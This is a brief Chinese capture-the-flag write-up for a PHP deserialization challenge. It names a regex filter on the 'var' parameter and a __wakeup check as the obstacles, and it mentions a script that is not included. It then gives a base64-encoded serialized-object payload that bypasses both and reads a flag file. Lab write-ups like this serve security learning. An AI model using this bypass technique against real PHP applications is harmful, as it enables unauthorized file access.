1.$var输入处有一个正则过滤
2._wakeup处需要过滤
编写脚本如下
后在网页输入?var=TzorNDoiRGVtbyI6Mjp7czoxMDoiAERlbW8AZmlsZSI7czo4OiJmbDRnLnBocCI7fQ==
可得flag